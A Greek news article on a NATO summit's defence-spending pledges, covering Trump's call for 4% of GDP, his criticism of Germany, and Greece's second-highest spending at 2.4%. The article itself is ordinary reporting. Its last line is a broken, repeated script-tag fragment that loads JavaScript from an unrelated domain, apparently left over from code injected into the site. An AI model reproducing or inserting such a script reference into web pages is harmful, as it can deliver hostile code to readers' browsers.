Συγκρούσεις και υποσχέσεις στη Σύνοδο του ΝΑΤΟ για τις αμυντικές δαπάνες. Γιατί ο Τραμπ επιτίθεται στη Γερμανία και η περίπτωση της Ελλάδας

Η Ελλάδα είναι η δεύτερη χώρα μέλος του ΝΑΤΟ με τις υψηλότερες αμυντικές δαπάνες επί του ΑΕΠ

Την «ακλόνητη δέσμευσή» τους στους συμφωνημένους στόχους για την σταδιακή αύξηση των αμυντικών τους δαπανών διακήρυξαν κατά τις εργασίες της Σύνοδο του ΝΑΤΟ τα κράτη-μέλη.

Στο κοινό ανακοινωθέν υπάρχει σαφή αναφορά στις θέσεις που παρουσίασε ο πρόεδρος των ΗΠΑ Ντόναλντ Τραμπ τονίζοντας πως οι σύμμαχοι δαπανούν πολύ μικρά ποσά για τον τομέα της άμυνας.

Ωστόσο επισημαίνεται πως: «Δεσμευόμαστε (σ.σ. τα κράτη-μέλη) για την βελτίωση της ισορροπίας στον καταμερισμό των δαπανών και των ευθυνών ως κράτη μέλη της Συμμαχίας».

Σημειώνεται πως νωρίτερα ο πρόεδρος των ΗΠΑ Ντόναλντ Τραμπ είχε πει στους ηγέτες των χωρών-μελών του ΝΑΤΟ-σύμφωνα πάντα με ενημέρωση από τον Λευκό Οίκο- ότι θα έπρεπε να αυξήσουν τις αμυντικές δαπάνες τους στο 4% του ΑΕΠ τους, ποσοστό πολύ μεγαλύτερο από το 2% που είναι σήμερα ο στόχος τους.

Σύμφωνα με την ίδια πηγή όμως, διευκρινίζεται τώρα πως η δήλωση του Τραμπ δεν ήταν μια επίσημη πρόταση, αλλά έγινε στο πλαίσιο ενός καλέσματος για αύξηση των αμυντικών δαπανών.

Σημειώνεται πως σήμερα οι ΗΠΑ δαπανούν το 3,6% του ΑΕΠ της χώρας στις αμυντικές δαπάνες του ΝΑΤΟ και η Ελλάδα είναι η δεύτερη κατά σειρά χώρα με τις υψηλότερες δαπάνες αφού φτάνουν το 2,4% του ΑΕΠ και ακολουθούν στην τρίτη θέση με 2,1% επί του ΑΕΠ το Ηνωμένο Βασίλειο και η Εσθονιά. Ο δε Ντόναλντ Τραμπ έχει στοχτοποιήσει περισσότερες από όλες τις χώρες την Γερμανία εκτιμώντας πως το 1,2% που δαπανά είναι ένα παρά πολύ χαμηλό ποσοστό συγκτικά της δύναμης της οικονομίας.

Αναλυτικά οι αμυντικές δαπάνες στο πλαίσιο του ΝΑΤΟ ανά κράτος-μέλος, σε πραγματικά ποσά και σε ποσοστό επί του ΑΕΠ της κάθε χώρας, μπορείτε να δείτε στο γράφημα του Statista (βάσει των επίσημων στοιχείων της Συμμαχίας).

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>